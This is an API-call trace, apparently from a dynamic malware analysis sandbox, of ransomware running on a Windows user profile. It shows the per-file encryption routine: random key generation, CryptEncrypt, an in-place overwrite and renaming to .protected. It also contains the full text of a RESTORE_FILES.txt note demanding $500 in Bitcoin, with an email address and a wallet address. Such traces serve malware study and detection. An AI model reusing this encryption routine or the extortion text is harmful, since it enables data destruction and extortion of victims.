[0095.271] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.271] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.271] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\.") returned 28 [0095.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.271] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.271] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.271] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | 
out: pbBuffer=0x295f12c) returned 1 [0095.271] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\." (normalized: "c:\\users\\default\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.271] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.271] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.271] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.271] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.271] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.271] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.271] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\..") returned 29 [0095.271] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.271] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.271] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.271] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.271] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.271] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.272] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.272] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.272] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.272] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.272] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.272] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.272] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.272] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrW (lpFirst="desktop.ini", 
lpSrch=".rar") returned 0x0 [0095.272] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0095.272] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.272] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0095.273] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.273] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0095.274] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.274] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.274] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.274] CloseHandle (hObject=0xb4) returned 1 [0095.274] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.protected") returned 48 [0095.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.protected" (normalized: "c:\\users\\default\\links\\desktop.ini.protected")) returned 1 [0095.292] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Windows") returned -1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files") returned -1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files (x86)") returned -1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0095.292] lstrcmpiW (lpString1="Desktop.lnk", lpString2="System Volume Information") returned -1 [0095.292] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.292] StrStrIW (lpFirst="Desktop.lnk", lpSrch=".protected") returned 0x0 [0095.292] lstrcmpW (lpString1="Desktop.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.292] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.293] StrStrW (lpFirst="Desktop.lnk", lpSrch=".txt") returned 0x0 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.293] StrStrW (lpFirst="Desktop.lnk", lpSrch=".rar") returned 0x0 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0095.293] StrStrW (lpFirst="Desktop.lnk", lpSrch=".zip") returned 0x0 [0095.293] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1d3, lpOverlapped=0x0) returned 1 [0095.294] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.294] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1d3, lpOverlapped=0x0) returned 1 [0095.294] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.294] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.294] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.294] CloseHandle (hObject=0xb4) returned 1 [0095.294] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.protected") returned 48 [0095.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.protected" (normalized: "c:\\users\\default\\links\\desktop.lnk.protected")) returned 1 [0095.295] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Windows") returned -1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files") returned -1 [0095.295] lstrcmpiW 
(lpString1="Downloads.lnk", lpString2="Program Files (x86)") returned -1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="$Recycle.bin") returned 1 [0095.295] lstrcmpiW (lpString1="Downloads.lnk", lpString2="System Volume Information") returned -1 [0095.295] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.295] StrStrIW (lpFirst="Downloads.lnk", lpSrch=".protected") returned 0x0 [0095.295] lstrcmpW (lpString1="Downloads.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.295] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.295] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.296] StrStrW (lpFirst="Downloads.lnk", lpSrch=".txt") returned 0x0 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.296] StrStrW (lpFirst="Downloads.lnk", lpSrch=".rar") returned 0x0 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0095.296] StrStrW (lpFirst="Downloads.lnk", lpSrch=".zip") returned 0x0 [0095.296] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x37e, lpOverlapped=0x0) returned 1 [0095.345] SetFilePointerEx (in: hFile=0xb4, 
liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.346] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x37e, lpOverlapped=0x0) returned 1 [0095.346] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.346] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.346] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.346] CloseHandle (hObject=0xb4) returned 1 [0095.346] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.protected") returned 50 [0095.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.protected" (normalized: "c:\\users\\default\\links\\downloads.lnk.protected")) returned 1 [0095.347] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Windows") returned -1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files") returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files (x86)") returned 1 [0095.347] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="$Recycle.bin") returned 1 [0095.347] lstrcmpiW 
(lpString1="RecentPlaces.lnk", lpString2="System Volume Information") returned -1 [0095.347] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.347] StrStrIW (lpFirst="RecentPlaces.lnk", lpSrch=".protected") returned 0x0 [0095.347] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.348] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.348] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".txt") returned 0x0 [0095.348] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.348] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".rar") returned 0x0 [0095.348] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0095.348] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".zip") returned 0x0 [0095.348] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0095.348] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.349] WriteFile (in: hFile=0xb4, 
lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0095.349] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.349] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.349] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.349] CloseHandle (hObject=0xb4) returned 1 [0095.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.protected") returned 53 [0095.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.protected" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.protected")) returned 1 [0095.350] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.350] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.350] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RESTORE_FILES.txt") returned 44 [0095.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xa4 [0095.351] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.351] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.351] lstrlenA (lpString="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") returned 684 [0095.351] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.351] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.351] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.351] CloseHandle (hObject=0xa4) returned 1 [0095.352] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="Windows") returned -1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files") returned -1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files (x86)") returned -1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="$Recycle.bin") returned 1 [0095.352] lstrcmpiW (lpString1="Local Settings", lpString2="System Volume Information") returned -1 [0095.352] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0095.352] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0095.352] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0095.352] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned 37 [0095.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.352] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="Windows") returned -1 [0095.352] lstrcmpiW 
(lpString1="Music", lpString2="Program Files") returned -1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="Program Files (x86)") returned -1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="$Recycle.bin") returned 1 [0095.352] lstrcmpiW (lpString1="Music", lpString2="System Volume Information") returned -1 [0095.352] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0095.352] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0095.352] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0095.352] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\*") returned 28 [0095.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.352] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.352] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.353] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.353] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.353] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\.") returned 28 [0095.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.353] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.353] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.353] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\Music\\." (normalized: "c:\\users\\default\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.353] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.353] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.353] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.353] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.353] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.353] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\..") returned 29 [0095.353] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.353] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.353] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\.." 
